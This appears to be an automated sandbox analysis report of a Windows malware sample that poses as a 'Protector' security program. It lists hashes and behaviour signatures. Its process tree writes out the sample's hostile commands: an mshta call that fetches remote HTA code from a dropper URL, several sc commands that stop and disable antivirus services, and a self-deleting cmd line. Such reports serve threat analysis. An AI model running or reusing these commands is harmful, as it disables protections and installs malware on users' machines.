Analysis

  • max time kernel
    188s
  • max time network
    186s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2022 07:50

General

  • Target

    5cd3c6f7a132d26bbdde1c082e1265b5c37b2b4ce7a6f283fc1a12cdce4fdffa.exe

  • Size

    1.8MB

  • MD5

    043a1c1b7811cb6f4e065cc38344b929

  • SHA1

    5d2559f9a3e05b9ab7b8c0c81f8f4371ca522492

  • SHA256

    5cd3c6f7a132d26bbdde1c082e1265b5c37b2b4ce7a6f283fc1a12cdce4fdffa

  • SHA512

    f11dd788253b2ed6f39a7091f1462013d27d7620a493819dd69ad17eb4a85449654eb524aa09a0b3b1d674d3d5b3acf52badfdb5a109e3b018d818e6d4ee15d1

  • SSDEEP

    49152:s0sBb4+y/icDmLVQdYHV3mVwe7LE0RGdXZactRx/9nMMq:i41/icSLv3kXEXXscd/9MMq

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://galaint.onlinesecstats.info/?0=166&1=3&2=1&3=65&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=jcygevtfwp&14=1

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Disables taskbar notifications via registry modification
  • Executes dropped EXE 1 IoCs
  • Sets file execution options in registry 2 TTPs 64 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies registry class 37 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5cd3c6f7a132d26bbdde1c082e1265b5c37b2b4ce7a6f283fc1a12cdce4fdffa.exe
    "C:\Users\Admin\AppData\Local\Temp\5cd3c6f7a132d26bbdde1c082e1265b5c37b2b4ce7a6f283fc1a12cdce4fdffa.exe"
    1⤵
    • Loads dropped DLL
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1588
    • C:\Users\Admin\AppData\Roaming\Protector-cqlq.exe
      C:\Users\Admin\AppData\Roaming\Protector-cqlq.exe
      2⤵
      • UAC bypass
      • Executes dropped EXE
      • Sets file execution options in registry
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Drops file in System32 directory
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • System policy modification
      PID:1720
      • C:\Windows\SysWOW64\mshta.exe
        mshta.exe "http://galaint.onlinesecstats.info/?0=166&1=3&2=1&3=65&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=jcygevtfwp&14=1"
        3⤵
        • Modifies Internet Explorer settings
        PID:1212
      • C:\Windows\SysWOW64\sc.exe
        sc stop WinDefend
        3⤵
        • Launches sc.exe
        PID:1296
      • C:\Windows\SysWOW64\sc.exe
        sc stop AntiVirService
        3⤵
        • Launches sc.exe
        PID:1084
      • C:\Windows\SysWOW64\sc.exe
        sc config ekrn start= disabled
        3⤵
        • Launches sc.exe
        PID:1476
      • C:\Windows\SysWOW64\sc.exe
        sc config AntiVirSchedulerService start= disabled
        3⤵
        • Launches sc.exe
        PID:280
      • C:\Windows\SysWOW64\sc.exe
        sc config AntiVirService start= disabled
        3⤵
        • Launches sc.exe
        PID:2044
      • C:\Windows\SysWOW64\sc.exe
        sc config msmpsvc start= disabled
        3⤵
        • Launches sc.exe
        PID:1648
      • C:\Windows\SysWOW64\sc.exe
        sc stop msmpsvc
        3⤵
        • Launches sc.exe
        PID:1028
      • C:\Windows\SysWOW64\sc.exe
        sc config WinDefend start= disabled
        3⤵
        • Launches sc.exe
        PID:996
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\5CD3C6~1.EXE" >> NUL
      2⤵
        PID:1992

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Protector-cqlq.exe
      Filesize

      1.8MB

      MD5

      043a1c1b7811cb6f4e065cc38344b929

      SHA1

      5d2559f9a3e05b9ab7b8c0c81f8f4371ca522492

      SHA256

      5cd3c6f7a132d26bbdde1c082e1265b5c37b2b4ce7a6f283fc1a12cdce4fdffa

      SHA512

      f11dd788253b2ed6f39a7091f1462013d27d7620a493819dd69ad17eb4a85449654eb524aa09a0b3b1d674d3d5b3acf52badfdb5a109e3b018d818e6d4ee15d1

    • C:\Users\Admin\AppData\Roaming\Protector-cqlq.exe
      Filesize

      1.8MB

      MD5

      043a1c1b7811cb6f4e065cc38344b929

      SHA1

      5d2559f9a3e05b9ab7b8c0c81f8f4371ca522492

      SHA256

      5cd3c6f7a132d26bbdde1c082e1265b5c37b2b4ce7a6f283fc1a12cdce4fdffa

      SHA512

      f11dd788253b2ed6f39a7091f1462013d27d7620a493819dd69ad17eb4a85449654eb524aa09a0b3b1d674d3d5b3acf52badfdb5a109e3b018d818e6d4ee15d1

    • \Users\Admin\AppData\Roaming\Protector-cqlq.exe
      Filesize

      1.8MB

      MD5

      043a1c1b7811cb6f4e065cc38344b929

      SHA1

      5d2559f9a3e05b9ab7b8c0c81f8f4371ca522492

      SHA256

      5cd3c6f7a132d26bbdde1c082e1265b5c37b2b4ce7a6f283fc1a12cdce4fdffa

      SHA512

      f11dd788253b2ed6f39a7091f1462013d27d7620a493819dd69ad17eb4a85449654eb524aa09a0b3b1d674d3d5b3acf52badfdb5a109e3b018d818e6d4ee15d1

    • \Users\Admin\AppData\Roaming\Protector-cqlq.exe
      Filesize

      1.8MB

      MD5

      043a1c1b7811cb6f4e065cc38344b929

      SHA1

      5d2559f9a3e05b9ab7b8c0c81f8f4371ca522492

      SHA256

      5cd3c6f7a132d26bbdde1c082e1265b5c37b2b4ce7a6f283fc1a12cdce4fdffa

      SHA512

      f11dd788253b2ed6f39a7091f1462013d27d7620a493819dd69ad17eb4a85449654eb524aa09a0b3b1d674d3d5b3acf52badfdb5a109e3b018d818e6d4ee15d1

    • memory/280-82-0x0000000000000000-mapping.dmp
    • memory/996-76-0x0000000000000000-mapping.dmp
    • memory/1028-77-0x0000000000000000-mapping.dmp
    • memory/1084-80-0x0000000000000000-mapping.dmp
    • memory/1212-74-0x0000000000000000-mapping.dmp
    • memory/1296-75-0x0000000000000000-mapping.dmp
    • memory/1476-79-0x0000000000000000-mapping.dmp
    • memory/1588-68-0x0000000000400000-0x00000000007C4000-memory.dmp
      Filesize

      3.8MB

    • memory/1588-58-0x0000000000400000-0x00000000007C4000-memory.dmp
      Filesize

      3.8MB

    • memory/1588-69-0x00000000002B0000-0x000000000030A000-memory.dmp
      Filesize

      360KB

    • memory/1588-54-0x0000000075CF1000-0x0000000075CF3000-memory.dmp
      Filesize

      8KB

    • memory/1588-55-0x0000000000400000-0x00000000007C4000-memory.dmp
      Filesize

      3.8MB

    • memory/1588-65-0x0000000004100000-0x00000000044C4000-memory.dmp
      Filesize

      3.8MB

    • memory/1588-56-0x00000000002B0000-0x000000000030A000-memory.dmp
      Filesize

      360KB

    • memory/1588-57-0x00000000033A0000-0x0000000003610000-memory.dmp
      Filesize

      2.4MB

    • memory/1588-64-0x0000000004100000-0x00000000044C4000-memory.dmp
      Filesize

      3.8MB

    • memory/1588-59-0x00000000002B0000-0x000000000030A000-memory.dmp
      Filesize

      360KB

    • memory/1648-78-0x0000000000000000-mapping.dmp
    • memory/1720-62-0x0000000000000000-mapping.dmp
    • memory/1720-73-0x0000000000310000-0x000000000036A000-memory.dmp
      Filesize

      360KB

    • memory/1720-72-0x00000000033A0000-0x0000000003610000-memory.dmp
      Filesize

      2.4MB

    • memory/1720-70-0x0000000000400000-0x00000000007C4000-memory.dmp
      Filesize

      3.8MB

    • memory/1720-83-0x0000000000400000-0x00000000007C4000-memory.dmp
      Filesize

      3.8MB

    • memory/1720-84-0x00000000033A0000-0x0000000003610000-memory.dmp
      Filesize

      2.4MB

    • memory/1992-67-0x0000000000000000-mapping.dmp
    • memory/2044-81-0x0000000000000000-mapping.dmp